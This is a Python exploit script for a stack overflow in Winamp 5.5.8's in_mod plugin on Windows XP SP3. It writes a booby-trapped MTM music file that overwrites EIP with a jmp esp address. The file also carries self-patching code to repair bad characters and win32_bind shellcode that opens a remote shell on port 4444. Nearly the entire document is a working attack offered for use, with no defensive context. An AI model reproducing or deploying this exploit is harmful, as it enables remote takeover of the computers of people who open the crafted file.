#!/usr/bin/python# Pwn And Beans by Mighty-D presents:# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet# Bug found by http://www.exploit-db.com/exploits/15248/# POC by fdisk# Exploit by Mighty-D# Special thanks to:# fdisk: Who wrote the skeleton of what you are looking at# Ryujin: For pointing the bug# Muts: For bringing the pain and the omelet ideas that weren't used# dijital1 and All the EDB-Team# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7# Just one comment: Stupid badchars!!!!!!!
header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header +="\x04\x0C"* 16
nopsled = "\x90"* 58207
eip = "\xED\x1E\x95\x7C"# jmp esp WIN XP SPANISH change at will
patch_shellcode = "\x90"* 16
patch_shellcode +="\x90\x33\xDB"# Set EBX to zero
patch_shellcode +="\x54\x5B"# PUSH ESP ; POP EBXGET THE RELATIVE POSITION
patch_shellcode +="\x81\xEB\x95\xFC\xFF\xFF"# make EBX point to our shell
patch_shellcode +="\x43"*13 # Move EBX as close as we can to the first badchar
patch_shellcode +="\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*1 # Move EBX to the first badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 13 -verified
patch_shellcode +="\x43"*3 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 05- verified
patch_shellcode +="\x43"*16 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\xEC"# Set it to 21 - verified
patch_shellcode +="\x43"*1 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x7C"# Set it to 8e - verified
patch_shellcode +="\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*30 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 05 - verified
patch_shellcode +="\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*11 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x42"# Set it to CB - verified
patch_shellcode +="\x43"*1 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x78"# Set it to 92 - verified
patch_shellcode +="\x90"*26 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*18 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 04 - verified
patch_shellcode +="\x90"*16 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*15 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 02 - verified
patch_shellcode +="\x43"*8 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x21"# Set it to EC - verified
patch_shellcode +="\x43"*1 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x7C"# Set it to 8e - verified
patch_shellcode +="\x90"*14 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*18 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x49"# Set it to c1 - verified
patch_shellcode +="\x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*4 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to EA, but we need F6
patch_shellcode +="\x80\x2B\xF4"# Set it to F6 - verified
patch_shellcode +="\x43"*9 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 11 - verified
patch_shellcode +="\x43"*10 # Move EBX to the next badchar
patch_shellcode +="\x90"*3 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x80\x2B\xCD"# Set it to 3D - verified
patch_shellcode +="\x43"*3 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 07 - verified
patch_shellcode +="\x43"*11 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 12 - verified
patch_shellcode +="\x43"*4 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 12 - verified
patch_shellcode +="\x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*4 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 12 - verified
patch_shellcode +="\x43"*8 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 12 - verified
patch_shellcode +="\x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*11 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x8E"# Set it to 7F - verified
patch_shellcode +="\x43"*1 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\xDF"# Set it to 2B - verified
patch_shellcode +="\x43"*8 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x1E"# Set it to EC - verified
patch_shellcode +="\x90"*11 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*12 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 8 - verified
patch_shellcode +="\x90"*28 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*29 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\xa7"# Set it to 66 - verified
patch_shellcode +="\x43"*1 # Move EBX to the next badchar
patch_shellcode +="\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x80\x2B\xb8"# Set it to 52 - verified
patch_shellcode +="\x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*17 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 3 - verified
patch_shellcode +="\x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*3 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 12 - verified
patch_shellcode +="\x90"*12 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*2 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 3 - verified
patch_shellcode +="\x43"*7 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 2 - verified
patch_shellcode +="\x90"*10 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*6 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 13 - verified
patch_shellcode +="\x43"*3 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to5 - verified
patch_shellcode +="\x43"*3 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x1B"# Set it to F2 - verified
patch_shellcode +="\x43"*1 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\xF4"# Set it to 16 - verified
patch_shellcode +="\x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*4 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 10 - verified
patch_shellcode +="\x43"*4 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 10 - verified
patch_shellcode +="\x90"*20 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*17 # Move EBX to the next badchar
patch_shellcode +="\x90"*28 # Lazy nopsled
patch_shellcode +="\x43"*16 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x26"# Set it to E7 - verified
patch_shellcode +="\x90"*18 # Nop sled to avoid damage from CrLf
patch_shellcode +="\x43"*1 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\xBE"# Set it to 4C - verified
patch_shellcode +="\x43"*7 # Move EBX to the next badchar
patch_shellcode +="\x80\x2B\x20"# Set it to 5 - verified
patch_shellcode +="\x90"*(66)# win32_bind -EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub
shellcode= "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode +="\x33"# Should be 13
shellcode +="\xa9\x41"
shellcode +="\x25"# should be 05
shellcode +="\x3f\x83\xeb\xfc\xe2\xf4\x55\x2b\xee\x72\x41\xb8\xfa\xc0"
shellcode +="\x56"# \x21\x8e Ripped
shellcode +="\x53\x8d\x65\x8e\x7a\x95\xca\x79\x3a\xd1\x40\xea\xb4"
shellcode +="\xe6\x59\x8e\x60\x89\x40\xee\x76\x22\x75\x8e\x3e\x47\x70\xc5\xa6"
shellcode +="\x25"# should be 05
shellcode +="\xc5\xc5\x4b\xae\x80\xcf\x32\xa8\x83\xee"# \xcb\x92
shellcode +="\x15\x21\x17"
shellcode +="\xdc\xa4\x8e\x60\x8d\x40\xee\x59\x22\x4d\x4e\xb4\xf6\x5d"
shellcode +="\x24"#Should be 04
shellcode +="\xd4\xaa\x6d\x8e\xb6\xc5\x65\x19\x5e\x6a\x70\xde\x5b\x22"
shellcode +="\x22"# Should be 02
shellcode +="\x35\xb4\xe9\x4d\x8e\x4f\xb5"# \xec\8e Ripped
shellcode +="\x7f\xa1\x1f\x6d\xb1\xe7\x4f\xe9\x6f"
shellcode +="\x56\x97\x63\x6c\xcf\x29\x36\x0d"# \xc1 Ripped
shellcode +="\x36\x76\x0d"# \xf6 ripped
shellcode +="\x15\xfa\xef"
shellcode +="\xc1\x8a\xe8\xc3\x92"
shellcode +="\x31"# Should be 11
shellcode +="\xfa\xe9\xf6\xc8\xe0\x59\x28\xac\x0d"# \x3d ripped
shellcode +="\xfc\x2b"
shellcode +="\x27"# should be 07
shellcode +="\xc0\x79\x29\xdc\x36\x5c\xec\x52\xc0\x7f"
shellcode +="\x32"# should be 12
shellcode +="\x56\x6c\xfa"
shellcode +="\x32"# should be 12
shellcode +="\x46\x6c\xea"
shellcode +="\x32"# should be 12
shellcode +="\xfa\xef\xcf\x29\x14\x63\xcf"
shellcode +="\x32"#should be 12
shellcode +="\x8c\xde"
shellcode +="\x3c\x29\xa1\x25\xd9\x86\x52\xC0"# \x7f\x2b Ripped
shellcode +="\x15\x6e\xfc\xbe\xd5\x57"
shellcode +="\x0d"# \xec Ripped
shellcode +="\x2b\xd6\xfe\xbe\xd3\x6c\xfc\xbe\xd5\x57\x4c"
shellcode +="\x28"# should be 08
shellcode +="\x83\x76"
shellcode +="\xfe\xbe\xd3\x6f\xfd\x15\x50\xc0\x79\xd2\x6d\xd8\xd0\x87\x7c\x68"
shellcode +="\x56\x97\x50\xc0\x79\x27\x6f\x5b\xcf\x29"# \x66\x52 Ripped
shellcode +="\x20\xa4\x6f\x6f"
shellcode +="\xf0\x68\xc9\xb6\x4e\x2b\x41\xb6\x4b\x70\xc5\xcc"
shellcode +="\x23"# shoudl be 03
shellcode +="\xbf\x47"
shellcode +="\x32"#Should be 12
shellcode +="\x57"
shellcode +="\x23"# Should be 03
shellcode +="\x29\xac\x24\x3b\x3d\x94"
shellcode +="\x22"# should be 02
shellcode +="\xea\x6d\x4d\x57\xf2"
shellcode +="\x33"# should be 13
shellcode +="\xc0\xdc"
shellcode +="\x25"# should be 5
shellcode +="\xfa\xe9"# \xf2\x16 Ripped
shellcode +="\x57\x6e\xf8"
shellcode +="\x30"#should be 10
shellcode +="\x6f\x3e\xf8"
shellcode +="\x30"# Should be 10
shellcode +="\x50\x6e"
shellcode +="\x56\x91\x6d\x92\x70\x44\xcb\x6c\x56\x97\x6f\xc0\x56\x76\xfa\xef"
shellcode +="\x22\x16\xf9\xbc\x6d\x25\xfa\xe9\xfb\xbe\xd5"
shellcode +="\x57\xd7\x99"#\xe7\x4c Ripped
shellcode +="\xfa\xbe\xd3\xc0\x79\x41"
shellcode +="\x25"# should be 05
shellcode +="\x3f"
payload = header + nopsled + eip + patch_shellcode + shellcode
try:
file = open("crash.mtm","w")
file.write(payload)
file.close()
print "MTM file generated successfuly"
except:
print "Cannot create file"
